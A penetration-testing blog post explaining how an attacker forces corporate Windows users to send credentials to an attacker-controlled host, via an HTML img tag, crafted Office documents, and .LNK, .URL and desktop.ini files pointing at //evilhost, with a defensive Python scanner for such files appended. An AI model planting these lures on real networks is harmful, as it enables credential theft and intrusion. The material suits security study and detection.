SMBRelay Bible 5: SMBRelay attacks on corporate users

Today we will talk about client-side attacks. An attack on a network is a progressive action. Normally, we escalate our rights step by step from nothing to domain administrator. Even ordinary unprivileged users can give us something interesting, for example access to some shared resources. But how can we get these user rights?

We can force users to authenticate to a machine we control.

There are at least three main ways to interact with a user. They are rather abstract.

1) HTML and browser

We can use social engineering or a MitM attack like DNS poisoning to bring users to our web site, which contains the following code: <img src="\\evilhost\test">

Their browsers will try to fetch the image from our server and hand over the users' credentials, and the users will notice nothing.

2) Crafted document

We can create a special document (for example an MS Excel file) and send it to users via e-mail or put it on a shared resource. When a user opens it, the Office program tries to connect to our server and gives us the user's credentials. We will discuss this in detail in the next blog post.

3) Windows Explorer and shared resources

If we have permission to write to a shared resource (for example a file server or a directory on a terminal server), we can create a specially crafted file. When somebody browses to the folder containing that file, Explorer will try to connect to our server without any interaction from the user.

Such a "specially crafted file" can be:

  • .LNK – Windows Shortcut File. A shortcut can have its own icon. We can point the icon path at our server and Explorer will try to download it.
  • .URL – Internet Location File. Like an LNK file it can carry an icon reference, but a URL file is a plain text file. So we write the following text and save it with the .URL extension:

      [InternetShortcut]
      URL=http://erpscan.com/
      IconIndex=3
      IconFile=//evilhost/test

  • desktop.ini. This file is used for folder customization. There are several fields (InfoTip, desktop.ini, LocalizedResourceName, IconFile (IconResource for Vista/7)) that can carry the necessary links to our server; their effects on Explorer differ (you can read about it here). A small limitation: the folder containing desktop.ini must have the 'system' attribute, which can be set with 'attrib +s folder_name'. But there are some pluses: desktop.ini is 'hidden' by default, and folders like "My Documents", drive roots ("Disc C (D, E, ...)") and "Desktop" are 'system' by default. Here is a simple example of desktop.ini:

      [.ShellClassInfo]
      IconFile=//evilhost/test
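From the defender's side, the text-based variants above (.URL and desktop.ini) are easy to audit on a share. The following is an added example, not code from the original post: it parses the INI-style fields named above and reports any that point at a UNC host outside an allowlist. The sample file contents and the host name fileserver01 are constructed for the demonstration.

```python
"""Flag .URL/desktop.ini files whose icon fields point at an untrusted UNC host (added defensive example)."""
import configparser
import re

# Fields the post names as able to carry a link that Explorer will follow.
WATCHED_KEYS = {"iconfile", "iconresource", "infotip", "localizedresourcename"}
# A value that starts with a UNC-style host: \\host\... or //host/...
UNC_HOST = re.compile(r"^\s*(?:\\\\|//)([^\\/\s]+)")

def decode_ini(raw: bytes) -> str:
    """Windows often writes desktop.ini as UTF-16 with a BOM; otherwise decode leniently."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")

def find_unc_references(text: str, allowed_hosts=()):
    """Return (section, key, host) for each watched field naming a UNC host not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep the original key spelling for the report
    try:
        parser.read_string(text)
    except configparser.Error:  # not INI text at all: nothing Explorer would parse either
        return []
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            match = UNC_HOST.match(value)
            if key.lower() in WATCHED_KEYS and match and match.group(1).lower() not in allowed:
                hits.append((section, key, match.group(1)))
    return hits

def scan_share(root, allowed_hosts=()):
    """Walk a share (root is a pathlib.Path); return (path, section, key, host) findings."""
    findings = []
    for path in root.rglob("*"):
        if path.name.lower() != "desktop.ini" and path.suffix.lower() != ".url":
            continue
        try:
            text = decode_ini(path.read_bytes())
        except OSError:
            continue
        for section, key, host in find_unc_references(text, allowed_hosts):
            findings.append((str(path), section, key, host))
    return findings
# Constructed samples: the .URL and desktop.ini shapes from the post, plus a benign desktop.ini.
SAMPLE_URL = "[InternetShortcut]\nURL=http://erpscan.com/\nIconIndex=3\nIconFile=//evilhost/test\n"
SAMPLE_DESKTOP_INI = "[.ShellClassInfo]\nIconFile=//evilhost/test\n"
BENIGN_DESKTOP_INI = ("[.ShellClassInfo]\nIconResource=C:\\Windows\\system32\\imageres.dll,-3\n"
                      "IconFile=\\\\fileserver01\\icons\\team.ico\nInfoTip=Shared project files\n")
```

Run scan_share(pathlib.Path(r"\\fileserver01\share"), {"fileserver01"}) against a mounted share to get one finding per untrusted reference; LNK files are binary and need a separate parser.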
